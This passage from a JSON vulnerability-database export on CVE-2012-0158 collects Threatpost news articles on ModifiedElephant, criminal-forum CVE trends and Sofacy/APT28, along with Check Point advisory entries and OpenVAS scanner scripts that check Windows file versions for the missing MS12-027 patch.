cooked-up \u201cevidence\u201d that supposedly connects the target to specific crimes right before what Hegel referred to as \u201cconveniently coordinated arrests,\u201d like the files planted on the devices used by OdaTV journalists Bar\u0131\u015f Pehlivan and M\u00fcyesser Y\u0131ld\u0131z.\n\nResearchers have identified hundreds of groups and individuals targeted by ModifiedElephant phishing campaigns: predominantly, they\u2019re activists, human rights defenders, journalists, academics and law professionals in India.\n\nThe APT primarily uses weaponized Microsoft Office files to deliver whichever malware the operators currently favor \u2013 a preference that\u2019s changed over time and depending on the target.\n\nHere\u2019s how the group has evolved over the years, researchers said:\n\n * Mid-2013: the actor used phishing emails containing executable file attachments with fake double extensions (filename.pdf.exe).\n * Post-2015: the actor moved on to less obvious files containing publicly available exploits, such as .doc, .pps, .docx, .rar, and password protected .rar files. These attempts involved legitimate lure documents in .pdf, .docx, and .mht formats to captivate the target\u2019s attention while also executing malware.\n * 2019: ModifiedElephant operators employed phishing campaigns that dangled links to files hosted externally for manual download and execution by the target.\n * 2020: As Amnesty International and Citizen Lab [documented](<https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/>), the operators also made use of large .rar archives (up to 300MB), potentially in an attempt to bypass detection, in a coordinated spyware attack that illegally targeted nine human rights defenders.\n\nSentinelLabs found that the lure documents they analyzed repeatedly made use of exploits of vulnerabilities that have been used plenty of times over the years \u2013 [CVE-2012-0158](<https://threatpost.com/extensible-attack-platform-has-familiar-feel/103021/>), [CVE-2014-1761](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>), [CVE-2013-3906](<https://threatpost.com/attacks-on-new-microsoft-zero-day-using-multi-stage-malware/102833/>) and [CVE-2015-1641](<https://threatpost.com/apt-targeting-tibetans-packs-four-vulnerabilities-in-one-compromise/117493/>) \u2013 to drop and execute malware. The spearphishing emails and lures use titles and themes around topics relevant to the target, Hegel said, \u201csuch as activism news and groups, global and local events on climate change, politics, and public service.\u201d\n\nBelow is another phishing example:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/11140538/phishing-sample-e1644606353578.jpg>)\n\nSpearphishing email containing malicious attachment attributed to ModifiedElephant. Source: SentinelLabs.\n\n## Critics of Authoritarian Governments, Beware\n\nSentinelOne cautions that it only took a look at \u201ca small subset\u201d of the total list of ModifiedElephant\u2019s potential targets, the actor\u2019s techniques and its objectives.\n\nMore work needs to be done, and many questions remain to be answered. But one thing\u2019s clear, researchers said: \u201cCritics of authoritarian governments around the world must carefully understand the technical capabilities of those who would seek to silence them.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-11T19:57:34", "type": "threatpost", "title": "Cybercrooks Frame Targets by Planting Fabricated Digital Evidence", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2013-3906", "CVE-2014-1761", "CVE-2015-1641", "CVE-2021-44228"], "modified": "2022-02-11T19:57:34", "id": "THREATPOST:8E47F9D5A51C75BA6BB0A1E286296563", "href": "https://threatpost.com/cybercrooks-frame-targets-plant-incriminating-evidence/178384/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-17T07:28:30", "description": "Criminal small talk in underground forums offer critical clues about which known Common Vulnerabilities and Exposures (CVEs) threat actors are most focused on. This, in turn, offers defenders clues on what to watch out for.\n\nAn analysis of such chatter, by Cognyte, examined 15 [cybercrime forums](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) between Jan. 2020 and March 2021. In its report, researchers highlight what CVEs are the most frequently mentioned and try to determine where attackers might strike next.\n\n\u201cOur findings revealed that there is no 100 percent correlation between the two parameters, since the top five CVEs that received the highest number of posts are not exactly the ones that were mentioned on the highest number of Dark Web forums examined,\u201d the report said. \u201cHowever, it is still enough to understand which CVEs were popular among threat actors on the Dark Web during the time examined.\u201d[](<https://threatpost.com/newsletter-sign/>)The researchers found [ZeroLogon](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>), [SMBGhost](<https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/>) and [BlueKeep](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>) were among the most buzzed about vulnerabilities among attackers between Jan. 2020 and March 2021.\n\n## **Six CVEs Popular with Criminals**\n\n[CVE-2020-1472](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472>) (aka ZeroLogon)\n\n[CVE-2020-0796](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0796>) (aka SMBGhost)\n\n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n[CVE-2019-0708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-0708>) (aka BlueKeep)\n\n[CVE-2017-11882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-11882>)\n\n[CVE-2017-0199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2017-0199>)\n\n\u201cMost of the CVEs in this list were abused by nation-state groups and cybercriminals, such as ransomware gangs, during worldwide campaigns against different sectors,\u201d the report said.\n\nNotably, all the CVEs threat actors are still focused on are old, meaning that basic patching and mitigation could have stopped many attacks before they even got started.\n\nThe report added, the 9-year-old [CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>) was exploited by threat actors during the COVID-19 pandemic in 2020, which, \u201cindicates that organizations are not patching their systems and are not maintaining a resilient security posture.\u201d\n\nMicrosoft has the dubious distinction of being behind five of the six most popular vulns on the Dark Web, Cognyte found. Microsoft has also had a tough time getting users to patch them.\n\nZeroLogon is a prime example. The [flaw in Microsoft\u2019s software](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) allows threat actors to access domain controllers and breach all Active Directory identity services. Patching ZeroLogon was so slow, Microsoft announced in January it would start blocking Active Directory domain access to unpatched systems with an \u201cenforcement mode.\u201d\n\nIn March 2020, Microsoft patched the number two vulnerability on the list, CVE-2020-0796, but as of October, 100,000 [Windows systems were still vulnerable](<https://threatpost.com/microsofts-smbghost-flaw-108k-windows-systems/160682/>).\n\nThe analysts explained varying CVEs were more talked about depending on the forum language. The CVE favored by Russian-language forums was CVE-2019-19781. Chinese forums were buzzing most about CVE-2020-0796. There was a tie between CVE-2020-0688 and CVE-2019-19781 in English-speaking threat actor circles. And Turkish forums were focused on CVE-2019-6340.\n\nThe researchers add, for context, that about half of the monitored forums were Russian-speaking and that Spanish forums aren\u2019t mentioned because there wasn\u2019t a clear frontrunning CVE discussed.\n\n**_Check out our free _**[**_upcoming live and on-demand webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {}, "published": "2021-07-16T21:07:15", "type": "threatpost", "title": "Top CVEs Trending with Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2019-0708", "CVE-2019-19781", "CVE-2019-6340", "CVE-2020-0688", "CVE-2020-0796", "CVE-2020-1472"], "modified": "2021-07-16T21:07:15", "id": "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "href": "https://threatpost.com/top-cves-trending-with-cybercriminals/167889/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:55:59", "description": "A new analysis of the Sofacy APT gang, a Russian-speaking group carrying out targeted attacks against military and government offices for close to a decade, shows a relentless wave of intrusions peaking this summer against victims in a number of NATO countries and the Ukraine.\n\nResearchers at Kaspersky Lab this morning [released their update on Sofacy](<https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/>), which is also known as APT28, Fancy Bear, Sednit and a handful of other monikers. The report demonstrates a barrage of zero-day vulnerabilities in Office, Java, Adobe and Windows at the group\u2019s disposal; the zero-days are being used against targets in attacks that remained active as of last month. The gang\u2019s malware implants were uncovered as well as its capabilities to quickly adapt to detection technologies and hit compromised machines with different backdoors so that in case one was found out, there would be fallbacks.\n\nSofacy\u2019s roots go back to around 2007, Kaspersky researchers said, with the name coming from an implant used in attacks four years ago that shared some similarities with the [Miniduke APT](<https://threatpost.com/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713/77569/>) gang uncovered by Kaspersky Lab in 2013 executing espionage activity against governments in Europe.\n\nSofacy\u2019s rapid capability expansion began in 2013 when a number of new backdoors and malware tools were discovered, including CORESHELL, JHUHUGIT and AZZY among others.\n\nThis summer, the AZZY implant got a facelift and was used as recently as October along with a new USB-stealing malware designed to hit air-gapped machines.\n\nIn July, researchers at iSight Partners reported that Sofacy, or Tsar Team as iSight calls them, had dropped their [sixth zero day exploit in four months](<https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825/>), two of which in Office and Java were patched during a span of a few days in July.\n\n\u201cUsually, when someone publishes research on a given cyber-espionage group, the group reacts: either it halts its activity or dramatically changes tactics and strategy. With Sofacy, this is not always the case. We have seen it launching attacks for several years now, and its activity has been reported by the security community multiple times,\u201d said Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab.\n\nFive of the six zero days, iSight said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach. Given the underground value of unpatched and unreported vulnerabilities, this was highly unusual behavior, even for a state-sponsored cyberespionage team.\n\nKaspersky researchers said that it discovered the group was using a Flash and Java zero day to drop the JHUHUGIT malware implant, which became its most prevalent first-stage implant in subsequent attacks.\n\nThe updated AZZY Trojan, meanwhile, surfaced in August in attacks against higher profile victims, and including in one case, a defense contractor, Kaspersky researchers said. While the first sample was spotted on July 29 and signatures quickly added to security systems, Kaspersky researchers said that by Aug. 4, another sample was in the wild. What made the AZZY update stand out was that it was not delivered via a zero-day, instead it was delivered and installed by separate malware already on the system, a dropper called msdeltemp.dll that the attackers controlled via backdoors in order to send commands to infected machines.\n\n\u201cThis code modification marks an unusual departure from the typical AZZY backdoors, with its C&C communication functions moved to an external DLL file,\u201d Kaspersky researchers wrote in their report. \u201cIn the past, the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry, instead of storing it in the malware itself, so this code modularization follows the same line of thinking.\u201d\n\nIn addition to traditional data-stealing capabilities, Sofacy also covets information stored on air-gapped machines and uses its USBSTEALER implant to drain these machines of valuable content.\n\nThis is behavior similar to that of the Equation group, one of the most sophisticated state-sponsored groups, which invested significant resources in developing more than 100 malware implants, each with their own purpose and used selectively against valuable targets.\n\n\u201cIn 2015 its activity increased significantly, deploying no less than five 0-days, making Sofacy one of the most prolific, agile and dynamic threat actors in the arena,\u201d Raiu said. \u201cWe have reasons to believe that these attacks will continue.\u201d\n", "cvss3": {}, "published": "2015-12-04T07:05:37", "type": "threatpost", "title": "Sofacy APT28 Gang Using New Backdoors, Zero Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-3333", "CVE-2011-2140", "CVE-2012-0158", "CVE-2012-1856", "CVE-2014-6352", "CVE-2015-2375", "CVE-2015-2376", "CVE-2015-2377", "CVE-2015-2424", "CVE-2015-5119"], "modified": "2015-12-04T21:35:34", "id": "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "href": "https://threatpost.com/relentless-sofacy-apt-attacks-armed-with-zero-days-new-backdoors/115556/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T07:12:50", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer.", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "checkpoint_advisories", "title": "MSCOMCTL.OCX Killbit: 996BF5E0-8044-4650-ADEB-0B013914E99C (MS12-027; CVE-2012-0158)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-132", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:12:41", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in an ActiveX control. To trigger this issue, an attacker can create a malicious web page that initiates the vulnerable ActiveX control. Successful exploitation of this vulnerability allows execution of arbitrary code on the vulnerable system.", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "checkpoint_advisories", "title": "MSCOMCTL.OCX Killbit: bdd1f04b-858b-11d1-b16a-00c0f0283628 (MS12-027; CVE-2012-0158)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2016-02-23T00:00:00", "id": "CPAI-2012-133", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:02:41", "description": "A code execution vulnerability has been reported in Microsoft Windows. The vulnerability is due to insufficient boundary check in the MSCOMCTL ActiveX control. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows MSCOMCTL.OCX ActiveX Control Remote Code Execution - Ver2 (CVE-2012-0158)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2014-04-16T00:00:00", "id": "CPAI-2014-1384", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:10:12", "description": "A remote code execution vulnerability has been reported in the Microsoft Windows common controls.", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft MSCOMCTL.OCX ActiveX Control Remote Code Execution (MS12-027; CVE-2012-0158)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-129", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:12:44", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in an ActiveX control. To trigger this issue, an attacker can create a malicious web page that initiates the vulnerable ActiveX control. Successful exploitation of this vulnerability allows execution of arbitrary code on the vulnerable system.", "cvss3": {}, "published": "2012-04-10T00:00:00", "type": "checkpoint_advisories", "title": "MSCOMCTL.OCX Killbit: 9181DC5F-E07D-418A-ACA6-8EEA1ECB8E9E (MS12-027; CVE-2012-0158)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2016-02-23T00:00:00", "id": "CPAI-2012-130", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:12:42", "description": "A remote code execution vulnerability has been reported in Microsoft Internet Explorer. The vulnerability is due to an error in an ActiveX control. To trigger this issue, an attacker can create a malicious web page that initiates the vulnerable ActiveX control. Successful exploitation of this vulnerability allows execution of arbitrary code on the vulnerable system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2012-04-10T00:00:00", "type": "checkpoint_advisories", "title": "MSCOMCTL.OCX Killbit: C74190B6-8589-11d1-B16A-00C0F0283628 (MS12-027; CVE-2012-0158; CVE-2016-0012)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2016-0012"], "modified": "2016-02-23T00:00:00", "id": "CPAI-2012-131", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:10:34", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:902829", "href": "http://plugins.openvas.org/nasl.php?oid=902829", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms12-027.nasl 5366 2017-02-20 13:55:38Z cfi $\n#\n# Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code\n within the context of the application.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft SQL Server 2008\n Microsoft Visual Basic 6.0\n Microsoft Commerce Server 2009\n Microsoft SQL Server 2005 Service Pack 4\n Microsoft SQL Server 2000 Service Pack 4\n Microsoft Visual FoxPro 9.0 Service Pack 2\n Microsoft Visual FoxPro 8.0 Service Pack 1\n Microsoft Commerce Server 2007 Service Pack 2\n Microsoft Commerce Server 2002 Service Pack 4\n Microsoft Office 2010 Service Pack 1 and prior\n Microsoft Office 2007 Service Pack 3 and prior\n Microsoft Office 2003 Service Pack 3 and prior\n Microsoft SQL Server 2000 Analysis Services Service Pack 4\";\ntag_insight = \"The flaw is due to an error within the ListView, ListView2, TreeView\n and TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls and can\n be exploited to corrupt memory.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms12-027\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.\";\n\nif(description)\n{\n script_id(902829);\n script_version(\"$Revision: 5366 $\");\n script_bugtraq_id(52911);\n script_cve_id(\"CVE-2012-0158\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 14:55:38 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 11:11:11 +0530 (Wed, 11 Apr 2012)\");\n script_name(\"Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/48786\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1026904\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-027\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nkey = \"\";\nver = \"\";\nkeys = \"\";\nitem = \"\";\npath = \"\";\nsysPath = \"\";\nbizName = \"\";\ndllVer = NULL;\nsysVer = NULL;\nexeVer = NULL;\n\n## Check for Windows OS\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(! sysPath){\n exit(0);\n}\n\n## Get Version from Mscomctl.Ocx file\nsysVer = fetch_file_version(sysPath, file_name:\"system32\\Mscomctl.Ocx\");\nif(! sysVer){\n exit(0);\n}\n\n## Check for Microsoft Office 2003, 2007 and 2010\nif(get_kb_item(\"MS/Office/Ver\") =~ \"^[11|12|14].*\")\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n## Check for Microsoft BizTalk Server 2002\nkey = \"SOFTWARE\\Microsoft\\BizTalk Server\\1.0\";\nif(registry_key_exists(key:key))\n{\n bizName = registry_get_sz(key:key, item:\"ProductName\");\n if(\"Microsoft BizTalk Server 2002\" >< bizName)\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for SQL Server 2005 and 2008\nforeach ver (make_list(\"2005\", \"10\"))\n{\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\Microsoft SQL Server \" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft Commerce Server 2002, 2007 or 2009\nkeys = make_list(\"SOFTWARE\\Microsoft\\Commerce Server\",\n \"SOFTWARE\\Microsoft\\Commerce Server 2007\",\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"+\n \"\\Microsoft Commerce Server 2009\");\nforeach key (keys)\n{\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Visual Basic 6.0\nkey = \"SOFTWARE\\Microsoft\\Visual Basic\\6.0\";\nif(registry_key_exists(key:key))\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n## Check for Visual FoxPro 8.0 and 9.0\nforeach ver (make_list(\"8.0\", \"9.0\"))\n{\n key = \"SOFTWARE\\Microsoft\\VisualFoxPro\\\" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft SQL Server 2000 Analysis Services\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000 Analysis Services\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n dllVer = fetch_file_version(sysPath:path, file_name:\"bin\\msmdctr80.dll\");\n if(dllVer)\n {\n if(version_is_less(version:dllVer, test_version:\"8.0.2302.0\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft SQL Server 2000\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n exeVer = fetch_file_version(sysPath:path, file_name:\"Binn\\sqlservr.exe\");\n if(exeVer)\n {\n ## Check for GDR and QFE versions\n if(version_is_less(version:exeVer, test_version:\"2000.80.2065.0\") ||\n version_in_range(version:exeVer, test_version:\"2000.80.2300.0\", test_version2:\"2000.80.2300.9\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:04:19", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2020-01-07T00:00:00", "id": "OPENVAS:1361412562310902829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902829", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902829\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_bugtraq_id(52911);\n script_cve_id(\"CVE-2012-0158\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 11:11:11 +0530 (Wed, 11 Apr 2012)\");\n script_name(\"Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1026904\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute 